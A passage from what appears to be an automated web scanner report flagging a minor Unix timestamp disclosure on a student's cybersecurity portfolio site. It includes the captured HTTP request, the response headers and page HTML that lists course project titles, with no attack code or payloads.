          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          080804898
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        15. GET https://beekmans.dev/
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          083845791, which evaluates to: 1972-08-28 11:29:51

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
           <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
           <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
